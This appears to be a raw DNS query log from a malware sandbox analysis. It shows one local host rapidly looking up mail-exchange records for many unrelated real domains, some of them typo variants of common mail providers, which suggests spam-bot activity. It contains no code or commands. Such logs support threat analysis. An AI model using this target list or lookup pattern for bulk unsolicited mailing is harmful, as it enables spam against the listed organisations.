                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.744259119 CEST1.1.1.1192.168.2.30xae52No error (0)svitonline.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.774061918 CEST1.1.1.1192.168.2.30x5052No error (0)vlad.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.800235987 CEST1.0.0.1192.168.2.30xc753Name error (3)vitor.tknonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.819614887 CEST1.1.1.1192.168.2.30xd154No error (0)send.aweber.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.820075035 CEST208.67.222.222192.168.2.30xd154No error (0)ftc-i.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.831518888 CEST1.0.0.1192.168.2.30xd154No error (0)barracuda.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.831518888 CEST1.0.0.1192.168.2.30xd154No error (0)barracuda.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.845021963 CEST8.8.8.8192.168.2.30xda55No error (0)webtempmail.onlineMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.845021963 CEST8.8.8.8192.168.2.30xda55No error (0)webtempmail.onlineMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.847286940 CEST1.0.0.1192.168.2.30xda55No error (0)hertspartsft.nhs.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.847286940 CEST1.0.0.1192.168.2.30xda55No error (0)hertspartsft.nhs.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.852308989 CEST9.9.9.9192.168.2.30xda55No error (0)reaganfoundation.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.852308989 CEST9.9.9.9192.168.2.30xda55No error (0)reaganfoundation.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.854000092 CEST9.9.9.9192.168.2.30xea55No error (0)swc-tx.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.854000092 CEST9.9.9.9192.168.2.30xea55No error (0)swc-tx.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.860044956 CEST8.8.4.4192.168.2.30xea55No error (0)cyberforma.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.860044956 CEST8.8.4.4192.168.2.30xea55No error (0)cyberforma.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.860044956 CEST8.8.4.4192.168.2.30xea55No error (0)cyberforma.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.872380018 CEST1.1.1.1192.168.2.30xf955No error (0)ebtnet.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.873330116 CEST8.8.8.8192.168.2.30xf955No error (0)uniroma2.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.873330116 CEST8.8.8.8192.168.2.30xf955No error (0)uniroma2.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.873330116 CEST8.8.8.8192.168.2.30xf955No error (0)uniroma2.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.873330116 CEST8.8.8.8192.168.2.30xf955No error (0)uniroma2.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.873330116 CEST8.8.8.8192.168.2.30xf955No error (0)uniroma2.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.873444080 CEST149.112.112.112192.168.2.30xda55No error (0)thehealthline.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.873903036 CEST8.8.4.4192.168.2.30xf955No error (0)hotmai.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.874933958 CEST149.112.112.112192.168.2.30xae52No error (0)sunshineblp.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.874933958 CEST149.112.112.112192.168.2.30xae52No error (0)sunshineblp.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.877691031 CEST149.112.112.112192.168.2.30xf955No error (0)gocsc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.877691031 CEST149.112.112.112192.168.2.30xf955No error (0)gocsc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.879133940 CEST8.8.4.4192.168.2.30xf955No error (0)ryico.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.880115986 CEST9.9.9.9192.168.2.30xea55No error (0)reuters.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.880115986 CEST9.9.9.9192.168.2.30xea55No error (0)reuters.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.882934093 CEST1.0.0.1192.168.2.30xb753No error (0)expotaranto.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.882934093 CEST1.0.0.1192.168.2.30xb753No error (0)expotaranto.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.890791893 CEST8.8.4.4192.168.2.30x956No error (0)cargill.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.890791893 CEST8.8.4.4192.168.2.30x956No error (0)cargill.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.893026114 CEST208.67.222.222192.168.2.30xd154No error (0)gmfi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.906061888 CEST8.8.8.8192.168.2.30xda55No error (0)mepotelco.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.913986921 CEST8.8.4.4192.168.2.30xda55No error (0)iutlook.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.917203903 CEST8.8.8.8192.168.2.30xea55No error (0)mc708.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.917203903 CEST8.8.8.8192.168.2.30xea55No error (0)mc708.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.921633005 CEST149.112.112.112192.168.2.30xea55No error (0)weber-metaux.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.921633005 CEST149.112.112.112192.168.2.30xea55No error (0)weber-metaux.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.921633005 CEST149.112.112.112192.168.2.30xea55No error (0)weber-metaux.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.921633005 CEST149.112.112.112192.168.2.30xea55No error (0)weber-metaux.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.921633005 CEST149.112.112.112192.168.2.30xea55No error (0)weber-metaux.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.922976971 CEST8.8.4.4192.168.2.30x956No error (0)vivify.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.922976971 CEST8.8.4.4192.168.2.30x956No error (0)vivify.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.930936098 CEST8.8.4.4192.168.2.30xea55No error (0)epilla.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.930936098 CEST8.8.4.4192.168.2.30xea55No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.942070961 CEST1.0.0.1192.168.2.30xd154No error (0)leva.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.942070961 CEST1.0.0.1192.168.2.30xd154No error (0)leva.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.943325996 CEST1.1.1.1192.168.2.30x3ac3No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.947381973 CEST1.0.0.1192.168.2.30xd154No error (0)ipsolutionz.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.947381973 CEST1.0.0.1192.168.2.30xd154No error (0)ipsolutionz.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.959320068 CEST1.1.1.1192.168.2.30xea55No error (0)terradoliva.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.973465919 CEST208.67.220.220192.168.2.30xb753No error (0)zhuko.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.985392094 CEST208.67.222.222192.168.2.30xf955No error (0)wolfeborobible.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.985392094 CEST208.67.222.222192.168.2.30xf955No error (0)wolfeborobible.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.994816065 CEST9.9.9.9192.168.2.30xda55No error (0)zeiss.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:42.994816065 CEST9.9.9.9192.168.2.30xda55No error (0)zeiss.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.021136999 CEST8.8.8.8192.168.2.30x956No error (0)p-per.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.037755966 CEST9.9.9.9192.168.2.30xf955No error (0)tabbi.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.041310072 CEST1.1.1.1192.168.2.30xf955No error (0)unav.esMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.041310072 CEST1.1.1.1192.168.2.30xf955No error (0)unav.esMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.041310072 CEST1.1.1.1192.168.2.30xf955No error (0)unav.esMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.041310072 CEST1.1.1.1192.168.2.30xf955No error (0)unav.esMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.041310072 CEST1.1.1.1192.168.2.30xf955No error (0)unav.esMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.051942110 CEST208.67.220.220192.168.2.30x9e52No error (0)visiorisk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.051942110 CEST208.67.220.220192.168.2.30x9e52No error (0)visiorisk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.051942110 CEST208.67.220.220192.168.2.30x9e52No error (0)visiorisk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.088388920 CEST9.9.9.9192.168.2.30x514aNo error (0)vizas.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.100332975 CEST1.0.0.1192.168.2.30x9e52No error (0)netcourrier.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.115315914 CEST208.67.222.222192.168.2.30xc84bNo error (0)conceriacaponigiuseppe.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.115315914 CEST208.67.222.222192.168.2.30xc84bNo error (0)conceriacaponigiuseppe.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.137159109 CEST1.0.0.1192.168.2.30xda55No error (0)cartadelapau.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.137159109 CEST1.0.0.1192.168.2.30xda55No error (0)cartadelapau.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.137159109 CEST1.0.0.1192.168.2.30xda55No error (0)cartadelapau.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.156116009 CEST208.67.220.220192.168.2.30x9e52No error (0)onlinesadik.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.205188036 CEST1.0.0.1192.168.2.30xc753No error (0)o2.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.205188036 CEST1.0.0.1192.168.2.30xc753No error (0)o2.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.205188036 CEST1.0.0.1192.168.2.30xc753No error (0)o2.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.205188036 CEST1.0.0.1192.168.2.30xc753No error (0)o2.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.211164951 CEST9.9.9.9192.168.2.30x956No error (0)uniparthenope.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.211164951 CEST9.9.9.9192.168.2.30x956No error (0)uniparthenope.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.227154970 CEST208.67.220.220192.168.2.30xf955No error (0)rcm.atMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.232280016 CEST1.0.0.1192.168.2.30xb753No error (0)paradigma.bizMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.281460047 CEST1.0.0.1192.168.2.30xd154No error (0)eriksminde.dkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.281460047 CEST1.0.0.1192.168.2.30xd154No error (0)eriksminde.dkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.297828913 CEST208.67.220.220192.168.2.30xea55No error (0)voiaj.mdMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.297828913 CEST208.67.220.220192.168.2.30xea55No error (0)voiaj.mdMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.309036016 CEST9.9.9.9192.168.2.30x514aNo error (0)plenimagem.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.330646038 CEST1.1.1.1192.168.2.30xda55No error (0)sabca.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.330646038 CEST1.1.1.1192.168.2.30xda55No error (0)sabca.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.330646038 CEST1.1.1.1192.168.2.30xda55No error (0)sabca.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.680283070 CEST162.159.26.27192.168.2.30xb05cNo error (0)power-trac.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.680283070 CEST162.159.26.27192.168.2.30xb05cNo error (0)power-trac.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.741528034 CEST138.197.103.178192.168.2.30xb05cNo error (0)net-up.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.741528034 CEST138.197.103.178192.168.2.30xb05cNo error (0)net-up.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.865317106 CEST221.215.1.204192.168.2.30xb05cNo error (0)kelon.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.865317106 CEST221.215.1.204192.168.2.30xb05cNo error (0)kelon.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.865317106 CEST221.215.1.204192.168.2.30xb05cNo error (0)kelon.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.865428925 CEST1.1.1.1192.168.2.30x8cb7No error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:43.917720079 CEST208.67.222.222192.168.2.30xd154No error (0)pec.vittoriaassicurazioni.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.001188993 CEST1.1.1.1192.168.2.30x7816No error (0)ns2.myvdc.it185.70.118.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.304697037 CEST1.1.1.1192.168.2.30x45c3No error (0)ns1.iptwins.net188.165.162.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.335302114 CEST185.70.118.250192.168.2.30x1561No error (0)whitemc.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.472384930 CEST1.1.1.1192.168.2.30xc2bdNo error (0)ns37.domaincontrol.com97.74.108.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.532702923 CEST162.219.54.2192.168.2.30x8663No error (0)uoit.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.532702923 CEST162.219.54.2192.168.2.30x8663No error (0)uoit.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.532702923 CEST162.219.54.2192.168.2.30x8663No error (0)uoit.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.536206961 CEST216.16.120.100192.168.2.30x8663No error (0)starpoint.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.623117924 CEST188.165.162.43192.168.2.30x8663No error (0)spatial.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.623117924 CEST188.165.162.43192.168.2.30x8663No error (0)spatial.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.635737896 CEST97.74.108.19192.168.2.30x6b65No error (0)bettzedek.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.635737896 CEST97.74.108.19192.168.2.30x6b65No error (0)bettzedek.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.635737896 CEST97.74.108.19192.168.2.30x6b65No error (0)bettzedek.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.675357103 CEST8.8.8.8192.168.2.30x8a65No error (0)juliemusic.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.683840990 CEST208.67.220.220192.168.2.30x7a65No error (0)crvi.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.683840990 CEST208.67.220.220192.168.2.30x7a65No error (0)crvi.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.683840990 CEST208.67.220.220192.168.2.30x7a65No error (0)crvi.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.701936007 CEST208.67.220.220192.168.2.30x8a65No error (0)tspl-india.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.703608990 CEST208.67.222.222192.168.2.30x7a65No error (0)harlandale.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.703608990 CEST208.67.222.222192.168.2.30x7a65No error (0)harlandale.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.705044031 CEST208.67.222.222192.168.2.30x7a65No error (0)3dplmsoftware.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.705044031 CEST208.67.222.222192.168.2.30x7a65No error (0)3dplmsoftware.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.724021912 CEST1.1.1.1192.168.2.30x60c7No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.724021912 CEST1.1.1.1192.168.2.30x60c7No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.724021912 CEST1.1.1.1192.168.2.30x60c7No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.729579926 CEST9.9.9.9192.168.2.30x7a65No error (0)bulldognews.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.739573956 CEST9.9.9.9192.168.2.30x7a65No error (0)sbcglobqal.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.739573956 CEST9.9.9.9192.168.2.30x7a65No error (0)sbcglobqal.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.755918026 CEST1.1.1.1192.168.2.30xe52bNo error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.755918026 CEST1.1.1.1192.168.2.30xe52bNo error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.755918026 CEST1.1.1.1192.168.2.30xe52bNo error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.755918026 CEST1.1.1.1192.168.2.30xe52bNo error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.771851063 CEST1.0.0.1192.168.2.30x7a65No error (0)blog-galaxy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.799179077 CEST208.67.220.220192.168.2.30x8a65No error (0)cdw.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.799179077 CEST208.67.220.220192.168.2.30x8a65No error (0)cdw.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.826988935 CEST1.1.1.1192.168.2.30x9a31No error (0)ns1.ignum.com185.65.223.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.827510118 CEST9.9.9.9192.168.2.30x7a65No error (0)my.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.839075089 CEST92.247.11.67192.168.2.30x8a65No error (0)virusadv.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.847631931 CEST8.8.4.4192.168.2.30x8a65No error (0)4uservizi.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.847631931 CEST8.8.4.4192.168.2.30x8a65No error (0)4uservizi.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.847631931 CEST8.8.4.4192.168.2.30x8a65No error (0)4uservizi.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.010274887 CEST1.1.1.1192.168.2.30x5369No error (0)antiochgolfclub.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.014462948 CEST8.8.8.8192.168.2.30x5369No error (0)turner.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.014462948 CEST8.8.8.8192.168.2.30x5369No error (0)turner.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.020694017 CEST208.67.220.220192.168.2.30x6269No error (0)us.esMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.026397943 CEST149.112.112.112192.168.2.30x5369No error (0)bc.dmgarch.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.030129910 CEST8.8.4.4192.168.2.30x6269No error (0)dgaccountants.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.030129910 CEST8.8.4.4192.168.2.30x6269No error (0)dgaccountants.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.031056881 CEST8.8.4.4192.168.2.30x6269No error (0)aqua-aerobic.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.031056881 CEST8.8.4.4192.168.2.30x6269No error (0)aqua-aerobic.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.031974077 CEST9.9.9.9192.168.2.30x5369No error (0)oktavist.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.031974077 CEST9.9.9.9192.168.2.30x5369No error (0)oktavist.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.038654089 CEST8.8.4.4192.168.2.30x6269No error (0)optimagroupinc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.038654089 CEST8.8.4.4192.168.2.30x6269No error (0)optimagroupinc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.042170048 CEST208.67.222.222192.168.2.30x8a65No error (0)mesp.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.042170048 CEST208.67.222.222192.168.2.30x8a65No error (0)mesp.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.045892954 CEST208.67.220.220192.168.2.30x7269No error (0)cei.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.045892954 CEST208.67.220.220192.168.2.30x7269No error (0)cei.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.045892954 CEST208.67.220.220192.168.2.30x7269No error (0)cei.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.045892954 CEST208.67.220.220192.168.2.30x7269No error (0)cei.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.054194927 CEST9.9.9.9192.168.2.30x6269No error (0)emael.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.060785055 CEST208.67.222.222192.168.2.30x9169No error (0)hlag.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.061323881 CEST8.8.4.4192.168.2.30x9169No error (0)allstate.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.061323881 CEST8.8.4.4192.168.2.30x9169No error (0)allstate.caMX (Mail exchange)IN (0x0001)false
